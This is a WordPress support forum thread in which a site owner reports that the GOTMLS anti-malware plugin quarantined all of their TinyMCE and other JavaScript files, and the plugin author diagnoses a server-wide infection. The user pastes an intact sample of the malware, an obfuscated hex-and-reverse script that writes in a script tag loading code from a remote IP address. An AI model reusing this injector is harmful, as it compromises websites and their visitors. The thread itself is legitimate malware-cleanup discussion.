Fixing /www/wp-includes/js/tinymce/plugins/media/plugin.min.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/wordpress/plugin.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/wordpress/plugin.min.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/textcolor/plugin.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/textcolor/plugin.min.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/wpautoresize/plugin.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/wpdialogs/plugin.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/wpeditimage/plugin.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/wpemoji/plugin.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/wpgallery/plugin.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/wplink/plugin.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/wplink/plugin.min.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/wptextpattern/plugin.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/wpview/plugin.js … Success!
Fixing /www/wp-includes/js/tinymce/plugins/wpview/plugin.min.js … Success!
Fixing /www/wp-includes/js/tinymce/themes/inlite/theme.js … Success!
Fixing /www/wp-includes/js/tinymce/themes/inlite/theme.min.js … Success!
Fixing /www/wp-includes/js/tinymce/themes/modern/theme.js … Success!
Fixing /www/wp-includes/js/tinymce/themes/modern/theme.min.js … Success!
Fixing /www/wp-includes/js/tinymce/utils/editable_selects.js … Success!
Fixing /www/wp-includes/js/tinymce/utils/form_utils.js … Success!
Fixing /www/wp-includes/js/tinymce/utils/mctabs.js … Success!
Fixing /www/wp-includes/js/tinymce/utils/validate.js … Success!Tried to send you ZIP files but email returned with Delivery to the following recipients failed permanently: Reason: Permanent Error
After scanning plugin puts under quarantine .js damaging templates and other plugins. Please advise //THANKS
I didn’t get your email. Please make sure you typed it correctly or contact me on my site: gotmls.net
It sounds like all the JS files on your server were infected. I would really like to see a sample of one of the infected files. Maybe you can look in the quarantine and click on one of the infected files to see the contents of that file, then hover over the numbered link above the file contents to see the name of the threat and click the link to highlight the malicious content.
Any of those details would be extremely helpful in diagnosing this issue. My contact info can also be found on the right side of the Anti-Malware Settings page.
Thanks, just resent you the email with link to the zipped files
Because of the attachment, the email was returning with:
Diagnostic-Code: smtp; 552-5.7.0 This message was blocked because its content presents a potentialSucuri.net is also showing the following on some of the sites:
wp-includes/js/jquery/jquery.js?ver=1.12.4 (More details)
Definition: malware.hex_reverse_script?1Hoover msg: JavaScript obscure eval array
The problem is all good .js are quarantined too thus fully crippling the sites.
The is the actual .js content.
var _0x2515=[“”,”\x6A\x6F\x69\x6E”,”\x72\x65\x76\x65\x72\x73\x65″,”\x73\x70\x6C\x69\x74″,”\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C”,”\x77\x72\x69\x74\x65″];document[_0x2515[5]](_0x2515[4][_0x2515[3]](_0x2515[0])[_0x2515[2]]()[_0x2515[1]](_0x2515[0]));-
This reply was modified 6 years, 10 months ago by
bibliata.
So, what is going on here is that all your JS files on your server are being completely overwritten with this virus, leaving nothing of the original scripts. After my plugin cleans the infection out of all those files then there is nothing left. The files can be restored from the original install but you need to secure your server so that they cannot be overwritten again. If you cannot get your hosting provider to secure your server then you should move your sites to a new server.
-
This reply was modified 6 years, 10 months ago by
- The topic ‘GOTMLS killed tinymce’ is closed to new replies.